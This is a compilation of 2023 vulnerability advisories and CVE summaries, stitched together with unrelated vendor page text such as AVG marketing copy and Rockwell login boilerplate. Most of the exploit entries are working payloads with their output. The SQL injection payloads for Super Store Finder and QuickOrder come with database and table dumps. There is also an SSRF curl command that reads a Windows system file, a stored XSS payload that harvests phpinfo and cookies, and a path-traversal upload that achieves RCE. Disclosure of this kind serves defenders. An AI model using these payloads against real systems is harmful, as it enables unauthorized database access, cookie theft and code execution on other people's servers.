Super Store Finder version 3.6 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://codecanyon.net/item/super-store-finder/3630922                     ││  Vendor   : Super Store Finder                                                         ││  Software : Super Store Finder 3.6                                                     ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php---------------------------------------------------------------------------------POST /products/superstorefinder/index.php HTTP/1.1ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI]---------------------------------------------------------------------------------POST parameter 'products' is vulnerable to SQL Injection---Parameter: products (POST)    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (IF - comment)    Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z---[+] Starting the Attackfetching current databasecurrent database: 'superstor_***'fetching tables[8 tables]+--------------+| categories_b || categories   || stores_c     || categories_c || stores_b     || users_b      || users        || stores       |+--------------+fetching columns for table 'users'[11 columns]+-------------+| id          || username    || password    || firstname   || lastname    || facebook_id || address     || email       || created     || modified    || status      |+-------------+[-] Done

Super Store Finder 3.6 SQL Injection

QuickOrder version 6.3.7 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://quickorder.by-code.com                                             ││  Vendor   : bylancer                                                                   ││  Software : QuickOrder 6.3.7                                                           ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /bloghttps://website/blog?s=[SQLI]GET parameter 's' is vulnerable to SQL Injection---Parameter: s (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: s=1') OR 02445=2445 OR ('04586'='4586    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (IF - comment)    Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z---[+] Starting the Attackfetching current databasecurrent database: 'quickordercode_**'fetching tables[39 tables]+-------------------------+| qr_orders               || qr_order_items          || qr_blog_comment         || qr_payments             || qr_menu_variants        || qr_options              || qr_time_zones           || qr_countries            || qr_restaurant           || qr_blog_categories      || qr_logs                 || qr_image_menu           || qr_balance              || qr_blog                 || qr_menu                 || qr_user                 || qr_pages                || qr_menu_extras          || qr_taxes                || qr_upgrades             || qr_usergroups           || qr_faq_entries          || qr_transaction          || qr_restaurant_options   || qr_languages            || qr_admins               || qr_allergies            || qr_user_options         || qr_order_item_extras    || qr_subscriptions        || qr_menu_variant_options || qr_plans                || qr_testimonials         || qr_plan_options         || qr_catagory_main        || qr_currencies           || qr_restaurant_view      || qr_waiter_call          || qr_blog_cat_relation    |+-------------------------+ [-] Done

QuickOrder 6.3.7 SQL Injection

Ateme TITAN File version 3.9 suffers from a server-side request forgery vulnerability that allows for file enumeration.

  
Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration

Vendor: Ateme  
Product web page: https://www.ateme.com  
Affected version: 3.9.12.4  
                  3.9.11.0  
                  3.9.9.2  
                  3.9.8.0

Summary: TITAN File is a multi-codec/format video transcoding  
software, for mezzanine, STB and ABR VOD, PostProduction, Playout  
and Archive applications. TITAN File is based on ATEME 5th Generation  
STREAM compression engine and delivers the highest video quality  
at minimum bitrates with accelerated parallel processing.

Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability  
exists in the Titan File video transcoding software. The application  
parses user supplied data in the job callback url GET parameter. Since  
no validation is carried out on the parameter, an attacker can specify  
an external domain and force the application to make an HTTP/DNS/File  
request to an arbitrary destination. This can be used by an external  
attacker for example to bypass firewalls and initiate a service, file  
and network enumeration on the internal network through the affected  
application.

Tested on: Microsoft Windows  
           NodeJS  
           Ateme KFE Software

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2023-5781  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php

22.04.2023

--

curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \  
         -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \  
         -H "User-Agent: sunee-mode" \  
         "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"

Call to file://C:\\windows\\system.ini returned 0

---

HTTP from Server  
----------------

POST / HTTP/1.1  
Host: ssrftest.zeroscience.mk  
Accept: */*  
Content-Type: application/xml  
Content-Length: 192

<?xml version='1.0' encoding='UTF-8' ?>  
<update>  
   <id>0000</id>  
   <name>dummy test job</name>  
   <status>aborted</status>  
   <progress>50</progress>  
   <message>message</message>  
</update>

Ateme TITAN File 3.9 Job Callbacks Server-Side Request Forgery

TwoNav v2.0.28-20230624 is vulnerable to Cross Site Scripting (XSS).

Vulnerability Product:TwoNav v2.0.28-20230624  
Vulnerability version: v2.0.28-20230624  
Vulnerability type: Stored XSS  
Vulnerability Details:  
Vulnerability location:add header 、"/index.php?c=api&method=read\_data&type=phpinfo&u=admin"

The default settings allowing free register, causes stored XSS  
the Stored XSS payload could let admin call phpinfo(); and bypassing the http-only , causes disclosure of cookies、root path of websites、variables of PHP and stuff

firstly , register an account at http://localhost/?c=login,  
account : test  
password : test  

then go to "站点设置",  
because of the http-only, you need to let admin call phpinfo(), the api is this : http://localhost/index.php?c=api&method=read\_data&type=phpinfo&u=admin  
enter the payload at the input of "头部(header)代码 - 用户", :

payload:

<script src\="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js" type\="text/javascript"\></script\>
<script\>
$.ajax({
                url: '/index.php?c=api&method=read\_data&type=phpinfo&u=admin',
                type: 'get',
                success: function (data) {
                    console.log(data);
                }
            })
</script>

and click "保存"  

after it , when an admin enter the page "http://localhost/?u=test", the page will automatically get phpinfo and call console.log() print it  
(Certainly you can update the payload to send phpinfo to your server, console log is a test)  
  
finally ,we download phpinfo and open it in html ,  
here is large number of cookies was disclosed, and root path of website  
  

proved Stored XSS

discovered by leeya\_bug

CVE-2023-37657: [Warning] Stored XSS in TwoNav v2.0.28-20230624 · Issue #3 · tznb1/TwoNav

SQL injection vulnerability in wmanager v.1.0.7 and before allows a remote attacker to obtain sensitive information via a crafted script to the company.php component.

**  
Free and Open source CRM, process manager  
and development framework**

WManager is a free and open source web application aimed to support companies business process automation.  
WManager includes a fully featured "**process manager**" which can work with little configuration efforts plus a very scalable **development framewotk.** You can i**mport extensions from third parties** (either free or charged), create **local (custom) extensions** and/or **develop new extensions** to be published in the community repository. WManager is based on the simple PHP/Postgres stack. It uses a standard and readable SQL database structure and carries a well designed "general purpose" business data model that you can extend and customize according to your needs, plus a nice frontend template.

WManager Demo

user: admin@admin.com pw: password

CVE-2023-36293: open source CRM, Process manager and extensions marketplace

The Rockwell Automation Enhanced HIM software contains 

an API that the application uses that is not protected sufficiently and uses incorrect Cross-Origin Resource Sharing (CORS) settings and, as a result, is vulnerable to a Cross Site Request Forgery (CSRF) attack. To exploit this vulnerability, a malicious user would have to convince a user to click on an untrusted link through a social engineering attack or successfully perform a Cross Site Scripting Attack (XSS). Exploitation of a CSRF could potentially lead to sensitive information disclosure and full remote access to the affected products.






Skip Navigation

menu

*   Support Center
*   Get Support Chat & Submit a Question Phone Support Holiday Schedule
*   Training & Webinars
*   Online Forum
*   Customer Care Customer Care Overview Phone Support Holiday Schedule

Sign In

Quickly log in or create an account using an existing service

Yahoo

What will happen: When you click on this button you will be taken to Yahoo. Once you log in, Yahoo will verify you and send you back here where you'll be logged in!

Log In or Create an AccountOpens new dialog

Please log in to continue, Username Password

Email Address \*

Username \*

Password

Re-enter a value for the field 'Password'

Must match Password

First Name \*

Last Name \*

Forgot your username or password?

The page will refresh upon submission. Any pending input will be lost.

Current product hierarchy

1.  Drives
2.  Medium Voltage Drives

ID: PN1630 | Access Levels: Everyone

**Search**

Did you mean:

**Published Date**Published Date 07/11/2023

**Login Required to View Full Answer Content**

Please use the 'Sign In' button above

CVE-2023-2746: Enhanced HIM Vulnerable to Cross Site Request Forgery Attack

An issue in AVG AVG Anti-Spyware v.7.5 allows an attacker to execute arbitrary code via a crafted script to the guard.exe component.

**Get free antivirus that's trusted by experts**

Get powerful, effective protection against viruses and other malware with free antivirus. It’s just one simple download.

2022  
Top Rated product

award-winning antivirus

ransomware protection

Lightweight and easy to use

Trusted by 435 million worldwide

**What problem can we help you solve?**

Or solve everything quickly and easily with AVG Ultimate

AVG Internet Security

**Protect what’s yours with Internet Security**

What’s yours is yours, and we keep it that way. Our new **Webcam Protection** and **Ransomware Protection** features make sure no one can use your built-in camera, or change your files without your permission.

AVG Antivirus for Android

**Smart phone, safe phone**

AVG AntiVirus for Android guards your mobile phone against malware attacks and threats to your privacy. We give you on-the-go protection against unsafe apps, anti-theft locker & tracker, and plenty more security and performance features.

AVG Tuneup

**Faster, cleaner, clever PC**

AVG TuneUp is your one-screen suite that makes your PC run faster, smoother, and longer: just how you like it.

**NEW**: Software Uninstaller removes bloatware and adware taking up space on your  
PC, giving you more memory for the things you really care about.

AVG Secure VPN

**Untrackable,  
unhackable,  
unbreakable Secure VPN**

Connect boldly to public Wi-Fi with our bank-grade, 256-bit AES encryption. We keep all your online activity private and away from hackers, nosy neighbors and curious agencies. And it doesn’t hurt that you can access your favorite content worldwide.

**For your business, safety first**

Give your small and medium business the security it needs. From antivirus and spyware protection to data transaction and file server security, our Business Edition products have all the features your business needs to survive and thrive beyond cyber threats.

Protect your business Protect your business

**World-class protection**

We’ve added **25 new accolades** in the past two years to the hundreds we have won since we started in 1991. Our top marks means you know you’re in good hands.

2022  
Top Rated product

2020  
Excellent

2022  
Top Rated product

**Get expert advice on security, privacy, and device performance**

**How to Get Rid of a Virus & Other Malware on Your Computer**

Need to remove a computer virus? We'll show you how to scan for signs and get rid of viruses and malware from your PC, Mac, or laptop.

Read More **The Ultimate Guide to Mac Security**

Think you've got Mac security covered? Learn how to protect your Mac from common threats like viruses, thieves and snoops with our essential safety tips.

Read More **How to Fix Windows 10 and 11 Black Screen Issues Before or After Logging In**

Learn how to fix black screen issues on a Windows 10 or 11 PC or laptop, if it appears before or after login, upon startup, or while working.

Read More **What Is a VPN and How Does It Work?**

Virtual private network (VPN) explained. Learn what a VPN is, why you need one, and how to use it. Then choose the right VPN service.

Read More **Why Your Phone Gets Hot and How to Fix It**

Is your Android phone getting too hot? Learn why your phone may be heating up, how to cool it down, and how to prevent your phone from overheating.

Read More **How to Find and Remove Viruses on Android Phones and iPhones**

Learn how to remove viruses from your Android phone and iPhone with our expert guide. Scan and remove mobile malware, then protect against future threats.

Read More **How to Unblock Websites & Access Restricted Content**

Learn how to unblock a website and bypass restrictions at school, home, and work with this guide — including with a VPN, Tor, and proxy servers.

Read More **How to Boost FPS and Optimize Your PC for Gaming**

Low FPS and stutter can totally destroy your gaming experience. Find out how to optimize your gaming PC's performance and increase your FPS.

Read More

Whatever devices you use, AVG has you covered

CVE-2023-36167: AVG 2023 | FREE Antivirus, VPN & TuneUp for All Your Devices

The Rockwell Automation PowerMonitor 1000 contains stored cross-site scripting vulnerabilities within the web page of the product.  The vulnerable pages do not require privileges to access and can be injected with code by an attacker which could be used to leverage an attack on an authenticated user resulting in remote code execution and potentially the complete loss of confidentiality, integrity, and availability of the product.




Skip Navigation

menu

*   Support Center
*   Get Support Chat & Submit a Question Phone Support Holiday Schedule
*   Training & Webinars
*   Online Forum
*   Customer Care Customer Care Overview Phone Support Holiday Schedule

Sign In

Quickly log in or create an account using an existing service

Yahoo

What will happen: When you click on this button you will be taken to Yahoo. Once you log in, Yahoo will verify you and send you back here where you'll be logged in!

Log In or Create an AccountOpens new dialog

Please log in to continue, Username Password

Email Address \*

Username \*

Password

Re-enter a value for the field 'Password'

Must match Password

First Name \*

Last Name \*

Forgot your username or password?

The page will refresh upon submission. Any pending input will be lost.

Current product hierarchy

1.  Automation Control
2.  Energy Monitoring
3.  PowerMonitor
4.  1408 PowerMonitor 1000

ID: PN1631 | Access Levels: Everyone

**Search**

Did you mean:

**Published Date**Published Date 07/11/2023

**Login Required to View Full Answer Content**

Please use the 'Sign In' button above

CVE-2023-2072: PowerMonitor™ 1000 – Cross-Site Scripting Vulnerability

WebsiteGuide v0.2 is vulnerable to Remote Command Execution (RCE) via image upload.

Vulnerability Product:WebsiteGuide v0.2  
Vulnerability version: 0.2  
Vulnerability type: Remote Command Execute  
Vulnerability Details:  
Vulnerability location: Image Upload

the variable "save\_path" in /websiteapp/views.py -> IconViewSet.post method, does not check the name of file user upload ,  
causes "../../" such path is available  
and does not check binary of the image  
causes user could upload image, pycode, html and stuff  
  
Insecure image upload could cover the original code , causes Remote Command Execute

payload : https://github.com/Leeyangee/leeya\_bug/blob/main/..1..1views.py  
the payload is original code at /websiteapp/views.py but add a simple function os.system() to verify rce  
(this is just a simple payload , It downloading index.html from http://www.bing.com , in order to verifying the vulnerability)

Firstly , Add a website in "分组管理"  

After built , visit http://localhost:8000/admin/website  
click navigator "网址管理", and click "替换图标"  
  
and click "上传图标" choose the payload (or the image you wanna upload in normal situation)  
finally click "确定" to upload

in the whole period of uploading , listening network

After upload the payload , you are able to observe the HTTP request that you just uploaded in burpsuite  
Send it to the repeater and replace filename ..1..1views.py to ../../views.py  
  

and finally , click Send , send the payload you had just modified  
then you can find that the original code /websiteapp/views.py has changed from  
  
to  
  
that means you just changed the pycode and could causes RCE vulnerability

just visit the website page to trigger the api /api/icon, you can find the index.html downloaded from http://www.bing.com at the path /websiteapp/  

proved RCE

by above method, you can upload your file to every file in website or cover every file in website

discovered by leeya\_bug

CVE-2023-37656: [Warning] RCE in WebsiteGuide v0.2 · Issue #12 · mizhexiaoxiao/WebsiteGuide

Cross-Site Request Forgery (CSRF) vulnerability in Pagup WordPress Robots.Txt optimization plugin <= 1.4.5 versions.

**Solution**

 Fixed

Update the WordPress WordPress Robots.txt optimization (+ XML Sitemap) – Website traffic, SEO & ranking Booster plugin to the latest available version (at least 1.4.6).

Found this useful? Thank Abdi Pranata for reporting this vulnerability. Buy a coffee ☕

Abdi Pranata discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Robots.txt optimization Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 1.4.6.

**Other vulnerabilities in this plugin**

 0 present

 3 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-25706: WordPress WordPress Robots.txt optimization (+ XML Sitemap) – Website traffic, SEO & ranking Booster plugin <= 1.4.5 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Tag

#web